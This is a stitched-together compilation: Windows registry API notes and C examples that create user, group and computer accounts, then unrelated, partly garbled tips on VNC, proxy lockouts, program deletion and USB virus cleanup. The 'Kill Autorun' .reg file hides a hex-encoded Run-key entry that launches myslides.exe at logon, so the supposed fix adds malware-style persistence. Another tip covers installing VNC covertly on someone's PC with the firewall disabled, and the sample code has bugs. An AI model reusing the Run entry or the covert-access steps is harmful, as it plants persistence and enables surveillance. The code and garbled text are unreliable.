between the time your application can read a value and use it, you may need to ensure your application has the latest data. You can use the RegNotifyChangeKeyValue() function to notify
65

the calling thread when there are changes to the attributes or contents of a registry key, or if the key is deleted. The function signals an event object to notify the caller. If the thread that calls RegNotifyChangeKeyValue() exits, the event is signaled and the monitoring of the registry key is stopped. You can control or specify what changes should be reported through the use of a notify filter or flag. Usually, changes are reported by signaling an event that you specify to the function. Note that the RegNotifyChangeKeyValue() function does not work with remote handles. Registry Files Applications can save part of the registry in a file and then load the contents of the file back into the registry. A registry file is useful when a large amount of data is being manipulated, when many entries are being made in the registry, or when the data is transitory and must be loaded and then unloaded again. Applications that back up and restore parts of the registry are likely to use registry files. To save a key and its subkeys and values to a registry file, an application can call the RegSaveKey() function. RegSaveKey() creates the file with the following information, depending upon which operating system it is running on. System File attributes Location if no path is specified Error returned if file already exists Windows Me/98/95 Archive, hidden, read-only system Created in the Windows directory for both local and remote keys. Error code 1016, ERROR_REGISTRY_IO_FAILED Windows Server 2003, Windows XP/2000/NT Archive

66

Created in the current directory of the process for a local key, and in the %systemroot%\system32 directory for a remote key. Error code 183, ERROR_ALREADY_EXISTS Table 4. To write the registry file back to the registry, an application can use the RegLoadKey(), RegReplaceKey(), or RegRestoreKey() function. RegLoadKey() loads registry data from a specified file into a specified subkey under HKEY_USERS or HKEY_LOCAL_MACHINE on the calling application's computer or on a remote computer. The function creates the specified subkey if it does not already exist. After calling this function, an application can use the RegUnLoadKey() function to restore the registry to its previous state. RegReplaceKey() replaces a key and all its subkeys and values in the registry with the data contained in a specified file. The new data takes effect the next time the system is started. RegRestoreKey() loads registry data from a specified file into a specified key on the calling application's computer or on a remote computer. This function replaces the subkeys and values below the specified key with the subkeys and values that follow the top-level key in the file. The RegConnectRegistry() function establishes a connection to a predefined registry handle on another computer. An application uses this function primarily to access information from a remote registry on other machines in a network environment, which you can also do by using the Registry Editor. You might want to access a remote registry to back up a registry or regulate network access to it. Note that you must have appropriate permissions to access a remote registry using this function. Registry Key Security and Access Rights The Windows security model enables you to control access to registry keys. You can specify a security descriptor for a registry key when you call the RegCreateKeyEx() or RegSetKeySecurity() function. If you specify NULL, the key gets a default security descriptor. The ACLs in a default security descriptor for a key are inherited from its direct parent key. To get the security descriptor of a registry key, call the GetNamedSecurityInfo() or GetSecurityInfo() function. The valid access rights for registry keys include the DELETE, READ_CONTROL, WRITE_DAC, and WRITE_OWNER standard access rights. Registry keys do not support the SYNCHRONIZE
67

standard access right. The following table lists the specific access rights for registry key objects. Value Meaning KEY_ALL_ACCESS Combines the STANDARD_RIGHTS_REQUIRED, KEY_QUERY_VALUE, KEY_SET_VALUE, KEY_CREATE_SUB_KEY, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, and KEY_CREATE_LINK access rights. KEY_CREATE_LINK Reserved for system use. KEY_CREATE_SUB_KEY Required to create a subkey of a registry key. KEY_ENUMERATE_SUB_KEYS Required to enumerate the subkeys of a registry key.

KEY_EXECUTE Equivalent to KEY_READ. KEY_NOTIFY Required to request change notifications for a registry key or for subkeys of a registry key. KEY_QUERY_VALUE Required to query the values of a registry key. KEY_READ
68

Combines the STANDARD_RIGHTS_READ, KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY values. KEY_SET_VALUE Required to create, delete, or set a registry value. KEY_WOW64_64KEY Enables a 64- or 32-bit application to open a 64-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values. KEY_WOW64_32KEY Enables a 64- or 32-bit application to open a 32-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values. KEY_WRITE Combines the STANDARD_RIGHTS_WRITE, KEY_SET_VALUE, and KEY_CREATE_SUB_KEY access rights. Table 5. When you call the RegOpenKeyEx() function, the system checks the requested access rights against the key's security descriptor. If the user does not have the correct access to the registry key, the open operation fails. If an administrator needs access to the key, the solution is to enable the SE_TAKE_OWNERSHIP_NAME privilege and open the registry key with WRITE_OWNER access. You can request the ACCESS_SYSTEM_SECURITY access right to a registry key if you want to read or write the key's SACL. Further reading and digging: For Multibytes, Unicode characters and Localization please refer to Locale, wide characters & Unicode (Story) and Windows users & groups programming tutorials (Implementation).

69

Structure, enum, union and typedef story can be found C/C++ struct, enum, union & typedef. Notation used in MSDN is Hungarian Notation instead of CamelCase and is discussed Windows programming notations. Windows data type information is in Windows data types used in Win32 programming. Check the best selling C, C++ and Windows books at Amazon.com. Microsoft Visual C++, online MSDN. MSDN library. C++ Tutorial My Training Period: xx hours. Before you begin, read some instruction here. This is a continuation from previous Windows User Accounts & Groups Programming 3. The expected skills are: Able to understand users and groups as implemented in Windows OSes. Able to understand and use functions to manipulate users, groups and machine account. Able to gather and understand the required information in order to use those functions. Able to understand, appreciate and apply how the Unicode/wide character implemented in Microsoft C programs.

Privilege and User Management As a restricted user, to run your program in debug mode you must be a member of the Debugger Users group. The following example will try to shows how a privilege is required to accomplish our task. First of all by using the previous program example, let add restricted users as a member of
70

Debugger Users group so that he can run programs in debug mode. Make sure you remove mytestgroup from the Administrators group as a result of the previous program example. A sample output: F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#1 mypersonal\myuser#1 has been added successfully to Debugger Users on mypersonal machine. F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#2 mypersonal\myuser#2 has been added successfully to Debugger Users on mypersonal machine. F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#3 mypersonal\myuser#3 has been added successfully to Debugger Users on mypersonal machine. F:\myproject\win32prog\Debug>

71

Then log off and log on as restricted user myuser#1 and start using Visual C++ .Net. First of all let try running our previous, first program example, creating users. //********* myuserprog.cpp **********

// For WinXp #define _WIN32_WINNT 0x0501 // Wide character/Unicode based program #ifndef UNICODE #define UNICODE #endif
72

#include <windows.h> #include <stdio.h> #include <lm.h> // This program accept 3 arguments: servername, username and password. // It is run on local WinXp machine so the servername is the // local WinXp machine name or you can use NULL for the 1st parameter // of the NetUserAdd() and arguments, should be without the servername. int wmain(int argc, wchar_t *argv[ ]) { USER_INFO_1 ui; DWORD dwLevel = 1; DWORD dwError = 0; NET_API_STATUS nStatus; if(argc != 4) { fwprintf(stderr, L"Usage: %s ServerName UserName Password.\n", argv[0]);

// or use fwprintf(stderr, L"Usage: %s UserName Password.\n", argv[0]);

// for local machine and adjust other argc and argv[] array element appropriately.

73

exit(1);

// Set up the USER_INFO_1 structure.

// USER_PRIV_USER: name identifies an normal user

// UF_SCRIPT: required for LAN Manager 2.0 and Windows NT and later.

ui.usri1_name = argv[2]; command line

// Username entered through

ui.usri1_password = argv[4];

// Password

ui.usri1_priv = USER_PRIV_USER; // As a normal/restricted user

ui.usri1_home_dir = NULL;

// No home directory

74

ui.usri1_comment = L"This is a test normal user account using NetUserAdd"; // Comment

ui.usri1_flags = UF_SCRIPT;

// Must be UF_SCRIPT

ui.usri1_script_path = NULL;

// No script path

// Call the NetUserAdd() function, specifying level 1.

nStatus = NetUserAdd(argv[1],

dwLevel,

(LPBYTE)&ui,

&dwError);

// If the call succeeds, inform the user.

75

if(nStatus == NERR_Success)

fwprintf(stderr, L"%s user has been successfully added on %s machine.\n", argv[2], argv[1]);

fwprintf(stderr, L"Username: %s password: %s.\n", argv[2], argv[3]); } // Otherwise, print the system error. else fprintf(stderr, "A system error has occurred: %d\n", nStatus); return 0;

A sample output:

76

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#1 12345678

user#1 user has been successfully added on mypersonal machine.

Username: user#1 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#2 12345678

user#2 user has been successfully added on mypersonal machine.

Username: user#2 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#3 12345678

user#3 user has been successfully added on mypersonal machine.

77

Username: user#3 password: 12345678.

F:\myuserprog\myuserprog\Debug>

Figure 5: user#1, user#2 and user#3 have been created.

Well, we can create a user account, just being a member of the Debugger Users group. Then let test the previous program that creates a local group.

//********* myuserproglg.cpp **********

78

// For WinXp

#define _WIN32_WINNT 0x0501

// Wide character/Unicode based program

#ifndef UNICODE

#define UNICODE

#endif

#include <windows.h>

#include <stdio.h>

#include <lm.h>

79

// This program accept 3 arguments: servername, GroupName and Comment.

int wmain(int argc, wchar_t *argv[ ]) { LOCALGROUP_INFO_1 lgi1; DWORD dwLevel = 1; DWORD dwError = 0; NET_API_STATUS nStatus; if(argc != 4) { fwprintf(stderr, L"Usage: %s ServerName GroupName Comment\n", argv[0]); // Just exit, no further processing exit(1); } // Set up the LOCALGROUP_INFO_1 structure. // Assign the group name and comment lgi1.lgrpi1_name = argv[2]; // Local group name

lgi1.lgrpi1_comment = argv[3]; // Comment

80

// Call the NetLocalGroupAdd() function, specifying level 1. nStatus = NetLocalGroupAdd(argv[1], dwLevel, (LPBYTE)&lgi1, &dwError); // If the call succeeds, inform the user. if(nStatus == NERR_Success) fwprintf(stderr, L"%s local group has been created successfully on %s machine.\n", argv[2], argv[1]); // Otherwise, print the system error. else fprintf(stderr, "A system error has occurred: %d\n", nStatus); return 0; } A sample output: F:\myuserprog\myuserprog\Debug>myuserproglg Usage: myuserproglg ServerName GroupName Comment F:\myuserprog\myuserprog\Debug>myuserproglg mypersonal normalusergroup "Created by restricted user" normalusergroup local group has been created successfully on mypersonal machine. F:\myuserprog\myuserprog\Debug> Verify our task.
81

Figure 6: normalusergroup group has been created. Also successful. Then test adding a user to a group program example. When running the previous program example to add user as a member of built-in Users and Power Users groups, from the output, the following error code displayed. A sample output: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\myuser#1>f: F:\myuserprog\myuserprog\Debug>mynewaddmember Usage: mynewaddmember ServerName GroupName MemberAccountName-(DomainName\AccountName) F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal Users mypersonal\user#1

82

A system error has occurred: 5 F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal "Power Users" mypersonal\user#1 A system error has occurred: 5 F:\myuserprog\myuserprog\Debug> This error code means: 5 - Access is denied (ERROR_ACCESS_DENIED). So as a restricted user, we dont have privilege, because of the access token that we are carrying doesnt has permission to complete the task. Creating a Local Group and Adding a User Windows Server 2003 family, Windows XP, Windows 2000, and Windows NT use the same functions that Microsoft LAN Manager uses to create and maintain user and local group-account information. For example, to create a new local group, call the NetLocalGroupAdd() function. To add a user to that group, call the NetLocalGroupAddMembers() function. The following program allows you to create a user and a local group and then add the user to the local group. The following program example has been run on Windows 2000 member server of jmtibm.com domain. Its Fully Qualified Domain Name (FQDN) is jmti_st_00.jmtibm.com and the Domain Controllers (DC) FQDN is mawar.jmtibm.com. The member server was logged on as Domain Administrator. Compiler used is Visual C++ 6.0. The steps to include the netapi32.lib library (or other library) to the project in Visual C++ 6.0 are shown below.

83

Project menu Setting... sub menu. Then click the Link tab on the right page. Under Object/Library modules: type manually the library name at the end of the list separated by a space. Click the OK button. Figure 7: Adding library to Visual C++ project.

84

Figure 8: Another step of adding library to Visual C++ project. The let run our program example that create a new user and a group, then include the user as a member of that group. //********* myusrgrp.cpp ************ // Network management functions have their own // error codes... #define WIN32_WINNT 0x0500 #define UNICODE 1 #include <windows.h> #include <lmcons.h> #include <lmaccess.h> #include <lmerr.h> #include <lmapibuf.h> #include <stdio.h> #include <stdlib.h> NET_API_STATUS MyTestNet(LPWSTR lpszDomain, LPWSTR lpszUser, LPWSTR lpszPassword, LPWSTR lpszLocalGroup ) { USER_INFO_1 user_info;
85

LOCALGROUP_INFO_1

localgroup_info;

LOCALGROUP_MEMBERS_INFO_3 localgroup_members; LPWSTR NET_API_STATUS DWORD lpszPrimaryDC = L"mawar"; err = 0; parm_err = 0;

// First get the name of the primary domain controller. Make sure to free the returned buffer. err = NetGetDCName(L"mawar", lpszDomain, use lpszPrimaryDC (LPBYTE *)&lpszPrimaryDC ); // Local machine // Domain name, if NULL // Returned PDC

if(err != 0) { printf("Error getting DC name: %d\n", err); return(err); }

// Set up the USER_INFO_1 structure.

user_info.usri1_name = lpszUser;

86

user_info.usri1_password = lpszPassword;

user_info.usri1_priv = USER_PRIV_USER;

user_info.usri1_home_dir = TEXT("");

user_info.usri1_comment = TEXT("This is just a sample user lol!");

user_info.usri1_flags = UF_SCRIPT;

user_info.usri1_script_path = TEXT("");

err = NetUserAdd(lpszPrimaryDC, 1, more information (LPBYTE)&user_info, &parm_err); switch (err) { case 0:

// PDC name // Level, use other level for // Input buffer // Parameter in error

printf("%ls user successfully created.\n", user_info.usri1_name);

87

break; case NERR_UserExists: printf("%ls user already exists.\n", user_info.usri1_name); err = 0; break; case ERROR_INVALID_PARAMETER: { printf("Invalid Parameter Error adding user: Parameter Index = %d\n", parm_err); NetApiBufferFree(lpszPrimaryDC); return(err); } default: printf("Error adding %ls user: %d\n", user_info.usri1_name, err); NetApiBufferFree(lpszPrimaryDC); return(err); } // Set up the LOCALGROUP_INFO_1 structure. localgroup_info.lgrpi1_name = lpszLocalGroup; localgroup_info.lgrpi1_comment = TEXT("This is just a sample Local group."); err = NetLocalGroupAdd(lpszPrimaryDC, // PDC name

88

1, (LPBYTE)&localgroup_info, &parm_err); switch (err) { case 0:

// Level // Input buffer // Parameter in error

printf("%ls Local Group successfully created.\n", localgroup_info.lgrpi1_name); break; case ERROR_ALIAS_EXISTS: printf("%ls Local Group already exists.\n", localgroup_info.lgrpi1_name); err = 0; break; case ERROR_INVALID_PARAMETER: { printf("Invalid Parameter Error adding Local Group: Parameter Index = %d\n", err, parm_err); NetApiBufferFree(lpszPrimaryDC); return(err); } default:

89

printf("Error adding %ls Local Group: %d\n", localgroup_info.lgrpi1_name, err); NetApiBufferFree(lpszPrimaryDC); return(err); } // Now add the user to the local group. localgroup_members.lgrmi3_domainandname = lpszUser; err = NetLocalGroupAddMembers(lpszPrimaryDC, lpszLocalGroup, 3, (LPBYTE)&localgroup_members, 1); switch(err) { case 0: printf("%ls user successfully added to %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name); break; case ERROR_MEMBER_IN_ALIAS: printf("User %ls already in %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name); err = 0; break;
90

// PDC name // Group name // Name // Buffer // Count

default: printf("Error adding %ls user to %ls Local Group: %d\n", user_info.usri1_name, localgroup_info.lgrpi1_name, err); break; } NetApiBufferFree(lpszPrimaryDC); return (err); } // This program run at command prompt, receives 4 arguments: The domain name, // user name (user account), user password and the group name. int wmain(int argc, wchar_t *argv[]) { NET_API_STATUS err = 0; if(argc != 5) { printf("Usage: %ls <domain_name> <user_name> <password> <group_name>\n", argv[0]); exit (-1); } printf("Calling MyTestNet(): Create a user and a group then,\n"); printf("add the user to the group.\n");

91

printf("================================================= ==.\n"); err = MyTestNet(argv[1], argv[2], // domain name

// user account

argv[3], // password for the user argv[4]); // group name printf("MyTestNet() returned %d\n", err); return (0); } A sample output: C:\myproject\win32prog\Debug>myusrgrp Usage: myusrgrp <domain_name> <user_name> <password> <group_name> C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup Calling MyTestNet(): Create a user and a group then, add the user to the group. ===================================================. mytestuser user successfully created. mytestgroup Local Group successfully created. mytestuser user successfully added to mytestgroup Local Group. MyTestNet() returned 0

92

Rerun the program with same arguments. A sample output: C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup Calling MyTestNet(): Create a user and a group then, add the user to the group. ===================================================. mytestuser user already exists. mytestgroup Local Group already exists. User mytestuser already in mytestgroup Local Group. MyTestNet() returned 0 It looks OK. Then verify our task.

Figure 9: mytestuser user and mytestgroup group have been created.

93

The mytestuser user still not usable because there is no login name setting etc. Use NetUserSetInfo() function with different level to set other properties of the user account as demonstrated in the previous program example. For domain user account, when you try to delete the account there is a message prompted whether the mailbox of that user also need to be deleted. This means email account also has been created for that account. Creating a New Computer Account The following program example demonstrates how to create a new computer account using the NetUserAdd() function. The following are considerations for managing computer accounts: The computer account name should be all uppercase for consistency with Windows NT or later account management utilities. A computer account name always has a trailing dollar sign ($). Any functions used to manage computer accounts must build the computer name such that the last character of the computer account name is a dollar sign ($). For interdomain trust, the account name is TrustingDomainName$. The maximum computer name length is MAX_COMPUTERNAME_LENGTH (15). This length does not include the trailing dollar sign ($). The password for a new computer account should be the lowercase representation of the computer account name, without the trailing dollar sign ($). For interdomain trust, the password can be an arbitrary value that matches the value specified on the trust side of the relationship. The maximum password length is LM20_PWLEN (14). The password should be truncated to this length if the computer account name exceeds this length. The password provided at computer-account-creation time is valid only until the computer account becomes active on the domain. A new password is established during trust relationship activation.

94

The program example has been run on Windows 2000 member server of jmtibm.com domain same as the previous example.

//********* machineacct.cpp ********* // For Win 2000 #define _WIN32_WINNT 0x0500 // Wide character/Unicode based program #ifndef UNICODE #define UNICODE #endif #include <windows.h> #include <stdio.h> #include <lm.h> BOOL AddMachineAccount(LPWSTR wTargetComputer, LPWSTR MachineAccount, DWORD AccountType) { LPWSTR wAccount; LPWSTR wPassword; USER_INFO_1 ui; DWORD cbAccount; DWORD cbLength; DWORD dwError;

95

// Ensure a valid computer account type was passed. if(AccountType != UF_WORKSTATION_TRUST_ACCOUNT && AccountType != UF_SERVER_TRUST_ACCOUNT && AccountType != UF_INTERDOMAIN_TRUST_ACCOUNT) { SetLastError(ERROR_INVALID_PARAMETER); return FALSE; } else printf("Computer account type is valid.\n"); // Obtain the number of chars in computer account name. cbLength = cbAccount = lstrlenW(MachineAccount); // Ensure computer name doesn't exceed maximum length. if(cbLength > MAX_COMPUTERNAME_LENGTH) { SetLastError(ERROR_INVALID_ACCOUNT_NAME); return FALSE; } Else printf("Computer name length is valid.\n"); // Allocate storage to contain Unicode representation of

96

// computer account name + trailing $ + NULL. wAccount = (LPWSTR)HeapAlloc(GetProcessHeap(), 0, (cbAccount + 1 + 1) * sizeof(WCHAR) // Account + '$' + NULL ); if(wAccount == NULL) return FALSE; else printf("Memory allocation is OK.\n"); // Password is the computer account name converted to lowercase; // you will convert the passed MachineAccount in place. wPassword = MachineAccount; // Copy MachineAccount to the wAccount buffer allocated while // converting computer account name to uppercase. // Convert password (in place) to lowercase. while(cbAccount--) { wAccount[cbAccount] = towupper(MachineAccount[cbAccount]); wPassword[cbAccount] = towlower(wPassword[cbAccount]); } // Computer account names have a trailing Unicode '$'. wAccount[cbLength] = L'$'; wAccount[cbLength + 1] = L'\0'; // terminate the string

// If the password is greater than the max allowed, truncate.

97

if(cbLength > LM20_PWLEN) wPassword[LM20_PWLEN] = L'\0'; else printf("No truncation was done to the password, the length is OK, max is 14.\n");

// Initialize the USER_INFO_1 structure. ZeroMemory(&ui, sizeof(ui)); ui.usri1_name = wAccount; ui.usri1_password = wPassword; ui.usri1_flags = AccountType | UF_SCRIPT; ui.usri1_priv = USER_PRIV_USER; ui.usri1_comment = L"A virtual machine created by NetUserAdd()..."; dwError = NetUserAdd( wTargetComputer, 1, // target computer name

// info level // buffer

(LPBYTE) &ui, NULL );

// Release the allocated memory. if(wAccount) HeapFree(GetProcessHeap(), 0, wAccount); // Indicate whether the function was successful. if(dwError == NO_ERROR) {
98

printf("%ls computer account successfully created on %ls DC.\n", MachineAccount, wTargetComputer); return TRUE; } Else { SetLastError(dwError); return FALSE; } } // This program run at command prompt, receives 2 arguments: The target server and the machine account name. int wmain(int argc, wchar_t *argv[]) { if(argc != 3) { printf("Usage: %s <TargetComputer> <MachineAccount/Password>.\n", argv[0]); exit (-1); } DWORD AccountType = UF_WORKSTATION_TRUST_ACCOUNT; BOOL Test = AddMachineAccount(argv[1], argv[2], AccountType); printf("The return value is: %u\n", Test);
99

return 0; } A sample output: C:\myproject\win32prog\Debug>machineacct Usage: machineacct <TargetComputer> <MachineAccount/Password>. C:\myproject\win32prog\Debug>machineacct Mawar mymachine Computer account type is valid. Computer name length is valid. Memory allocation is OK. No truncation was done to the password, the length is OK, max is 14. mymachine computer account successfully created on Mawar DC. The return value is: 1Verify our task.

100

Figure 10: MYMACHINE computer account has been created.The user that calls the account management functions must have Administrator privilege on the target computer. In the case of existing computer accounts, the creator of the account can manage the account, regardless of administrative membership. The SeMachineAccountPrivilege can be granted on the target computer to give specified users the ability to create computer accounts. This gives nonadministrators the ability to create computer accounts. The caller needs to enable this privilege prior to adding the computer account. ------------------------User Accounts and Groups: Story and Program Examples, Part II-----------------------

Registry Key for Clear history of Remote Desktop Connections Registry: Start>Run>Regedit>OK HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default Then find the entry that you want to remove and delete it. If you connect to the same PC all the time then you can also add this in as the default option to avoid having to use the dropdown each time. VNCRemoteaccesssoftware Downloadthe"WindowsSelfInstallingPackage" Afteryouhavedownloadedityouwillneedtogototheoffenderspc'sinstallthe softwarewhichiseasyandsimple.Youwillneedtoinstallthe"Server"clientfor thekidspcandforyourpcinstallthe"Viewer".

101

AfteryouhaveinstalledthesoftwareonthekidsPC'syouwillneedtoclickonthe VNCIconatthebottomcornerofthescreen.Itwillnowaskyoutoputa passwordintheboxandalsoconfirmitinanotherbox.Applythosesettingsthen yourgoodtogo.OhanddontforgettotakeoftheWindowsFirewallormakeand exceptionwithintheprogramforVNC. WhenyougoontoyourPCclickon"VNCViewer".Thiswillopenuptheviewer software.ItwillnowaskyoutoputtheIPAddressorComputerNameinthebox toconnecttoit.Youneedtoknowwhatipadressthekidsareon.Therearemany waysofdoingthis.Herearesomeexamples: 1.)Pressstartandtypein"cmd"inthe"searchprogramsandfiles"boxandpress enter.Ablackboxwillappear.Typein"IPCONFIG/ALL"(Dontforgetthereisa spaceinthatcommand).Itwillnowshowyoulotsofstaticcontent.....Youneed the"IPv4Address".Itwillprobsbesomthinglikethis: 192.168.1.3 2.)Anotherwayisbygoingontoyourrouterandfindingwhereitsays"DHCP Leases".Thiswillshowwhoisconnectedorwhohasaleaseonyourrouter. ***ThiswayisprobsthebestasthereIPAddresscanchangefromtimetotime unlessyouchangetheleasetime*** ManuallyinRegistryEditortohidetrayiconinthecustomizenotification(itisin therightsidebottom) NOTE:ThiswillonlyturnonoroffAlwaysshowiconsandnotificationsonthe taskbar. 1.OpentheStartMenu. 2. Inthesearchbox,typeregeditandpressEnter.(Seescreenshotbelow)

102

 3.Inregedit,navigatetothelocationbelow.(Seescreenshotbelowstep4) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer 3. Intherightpane,rightclickonEnableAutoTrayandclickonModify.(See screenshotabove)

5.ToTurnOn"Alwaysshowalltaskbariconsandnotifcations" A)Typein0(zero)andclickonOK.(seescreenshotbelow)

103

 B)Gotostep7. 6.ToTurnOff"Alwaysshowalltaskbariconsandnotifcations" A)Typein1andclickonOK.(seescreenshotabove) 7.CloseRegedit. 8.Logoffandlogon,orrestartthecomputertoapplythechanges. InternetExploreraCutLockPannuvathu Open your registry and find the key below. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Interne t Settings] Change the value of "ProxyEnable" and set it to "1". Change the value of "ProxyServer" and set it to an IP address and port that is invalid on your network such as "10.0.0.1:5555" (i.e. "IP:Port"). By changing these settings Internet access will be disabled for any applications that rely of the Microsoft proxy server information such as Internet Explorer, Microsoft Office, Opera browser. To stop users from modifying the proxy settings add these restrictions to disable changes to the Internet configuration. Find or create the key below: [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] Create two DWORD values named "Connection Settings" and "Connwiz Admin Lock" and set them both to "1". To remove the restriction, set the proxy settings back to their original values and delete the policy values. Note: The change will take effect immediately for any new browser windows, existing Internet Explorer sessions will not be affect
104

ed until the browser is closed and reopened How to Remove Programs with Delete Command Prompt Author:Tomaz|Postedat:4/18/2009|FiledUnder:tutorial| Oneofthethetasksyoucandousingcommandpromptistocompletelyuninstall everyprograminyourcomputer.Ofcourseitisfareasiertousestandard add/removeorspecialthirdpartyuninstallersbutinsomerarecasesthereisno otherwaytouninstallprogramthanthroughcommandprompt.Forexample whenyouhavetobootintocorruptedWindowswithsocalledbootwith commandprompt.HerewearegoingtotakealookathowtouninstallCCleaner usingdeletecommandpromptfunction.

OpenStart>run>cmd.Enter"cd%programfiles%"andpressenter.Type"dir/p" withoutquotes.Youwillseethelistofallyourprogramsnow.Todeleteuninstall CCleanertyperd/s"CCleaner"andpress"Y".Thiswillpermanentlydeletethis programsobesureyouknowthisiswhatyouwant. Youcandeleteanyprogramusingthismethodjustreplacethenamewithwhat youwanttodelete.Readalsohowtouninstallprogramsusingcommandprompt. Youarehere:Home/HowTo/FilesonExternal/FlashDriveChangedtoShortcuts Virus Files on External/Flash Drive Changed to Shortcuts Virus
105

Issue I caught a virus on my flash drive at work and it appears to have changed all my file names to short cuts. I believe Ive cleaned the virus but how do i get my files back so that I can view them? Solution

* If you did not format your flash drive, then check whether the files are not in hidden mode. * Click on Start >Run>type cmd and click on OK. * Check your external Drive letter in My Computer * Here I assume your external drive as G: * Enter this command. * attrib -h -r -s /s /d g:*.* * Delete the unnecessary shortcuts. Note: Replace the letter g with your flash drive letter.

Kill Autorun
Step 1: Create .bat file like "KillAutorun.bat" paste below code to bat file.

attrib -r autorun.inf del autorun.inf md autorun.inf attrib +r +h autorun.inf Dissable_auto_run.reg

Step 2:
106

Creating .reg File "Dissable_auto_run.reg" to stop windows Auto run.

REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDriveAutoRun"=dword:000000ff [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ru n] "Policies"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,\ 77,69,6e,64,6f,77,73,33,32,5f,72,61,69,6e,73,74,65,72,5c,6d,79,73,6c,69,64,\ 65,73,2e,65,78,65,00 Step 3: Palce both files (Dissable_auto_run.reg and KillAutorun.bat) in USB root. Execute(doubble Click) KillAutorun.bat Step 4: Assume USB drive id is "I:" Open I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\ in this folder will have some exe file Eg: myslides.exe Create one batch file same as Step 1. Eg: Create .bat file like "KillAutorun.bat" paste below code to bat file. attrib -r myslides.exe del myslides.exe md myslides.exe attrib +r +h myslides.exe Run this bat file from "I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\" Note: S-1-5-21-1482476501-3352491937-682996330-1013 this folder name will differ from one system to another system.
107

Thanks and Regards Rajesh Natarajan MCDBA India

33. A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512, K:1024, Z:33554432

108